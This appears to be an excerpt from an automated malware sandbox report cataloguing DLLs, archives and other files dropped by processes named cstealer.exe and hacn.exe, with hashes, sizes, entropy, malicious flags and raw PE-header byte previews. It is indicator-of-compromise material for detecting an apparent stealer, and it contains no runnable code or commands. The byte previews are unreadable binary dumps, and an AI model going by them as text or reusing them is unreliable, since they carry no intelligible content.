                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98224
                                                                                                                                                          Entropy (8bit):6.452201564717313
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                          MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                          SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                          SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                          SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83736
                                                                                                                                                          Entropy (8bit):6.595094797707322
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                                          MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                                          SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                                          SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                                          SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):254744
                                                                                                                                                          Entropy (8bit):6.564308911485739
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                                                                                          MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                                                                                          SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                                                                                          SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                                                                                          SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64792
                                                                                                                                                          Entropy (8bit):6.223467179037751
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                                                                                          MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                                                                                          SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                                                                                          SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                                                                                          SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158488
                                                                                                                                                          Entropy (8bit):6.8491143497239655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                                                                          MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                                                                          SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                                                                          SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                                                                          SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):79128
Entropy (8bit):6.284790077237953
Encrypted:false
SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:819166054FEC07EFCD1062F13C2147EE
SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:true

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):880569
Entropy (8bit):5.682988287908638
Encrypted:false
SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMNE:lgYJiVBFLa2VIVwx/fpEWe+MNE
MD5:483D9675EF53A13327E7DFC7D09F23FE
SHA1:2378F1DB6292CD8DC4AD95763A42AD49AEB11337
SHA-256:70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
SHA-512:F905EB1817D7D4CC1F65E3A5A01BADE761BCA15C4A24AF7097BC8F3F2B43B00E000D6EA23CD054C391D3FDC2F1114F2AF43C8BB6D97C1A0CE747763260A864F5
Malicious:false

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3450648
Entropy (8bit):6.098075450035195
Encrypted:false
SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:9D7A0C99256C50AFD5B0560BA2548930
SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:true

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4458776
Entropy (8bit):6.460390021076921
Encrypted:false
SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:63A1FA9259A35EAEAC04174CECB90048
SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:true

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19846974
Entropy (8bit):7.998622680328521
Encrypted:true
SSDEEP:393216:R+4ZXxd1jEfniX1H4Ei8oTwLpKwjQ6qcx+5jmJZ4uqBVTkLDs6:RRfjEfnilH49HM9jQ6qpXHEQ6
MD5:8198AD352AB70C2C974AB5C716956CD7
SHA1:AC9AF7C21EA6F1181F1B4EE9599C78DDA98DED4F
SHA-256:1AD182A75CA930D93521CBF94A5A41BBAAF661586FCCD4F660FF2E6BE4AA208F
SHA-512:E9DEDB10C55127F6846C3D0F59ECE37EF349FFC23EAFB74713207DCF86F223E47D34BDF7E8F34527CC262A43A8CCFC2FA7F5A4DE1D0D327B7F082495B131879E
Malicious:true

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29976
Entropy (8bit):6.627859470728624
Encrypted:false
SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:true

Process:C:\ProgramData\Microsoft\hacn.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1123608
Entropy (8bit):5.3853088605790385
Encrypted:false
SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:81D62AD36CBDDB4E57A91018F3C0816E
SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):98736
Entropy (8bit):6.474996871326343
Encrypted:false
SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:F12681A472B9DD04A812E16096514974
SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):83328
Entropy (8bit):6.532254531979707
Encrypted:false
SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
MD5:4101128E19134A4733028CFAAFC2F3BB
SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):123768
Entropy (8bit):6.017133084000375
Encrypted:false
SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
MD5:6A9CA97C039D9BBB7ABF40B53C851198
SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):251768
Entropy (8bit):6.543870948107038
Encrypted:false
SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):63872
Entropy (8bit):6.166853300594844
Encrypted:false
SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
MD5:DE4D104EA13B70C093B07219D2EFF6CB
SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):158080
Entropy (8bit):6.835761878596918
Encrypted:false
SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
MD5:337B0E65A856568778E25660F77BC80A
SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):31104
Entropy (8bit):6.35436407327013
Encrypted:false
SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
MD5:FF8300999335C939FCCE94F2E7F039C0
SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):78200
Entropy (8bit):6.239347454910878
Encrypted:false
SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
MD5:8140BDC5803A4893509F0E39B67158CE
SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):118656
Entropy (8bit):6.2256831065058815
Encrypted:false
SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159616
Entropy (8bit):5.9948013841482926
Encrypted:false
SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
MD5:069BCCC9F31F57616E88C92650589BDD
SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1439447
Entropy (8bit):5.58639468240011
Encrypted:false
SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
Malicious:false
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
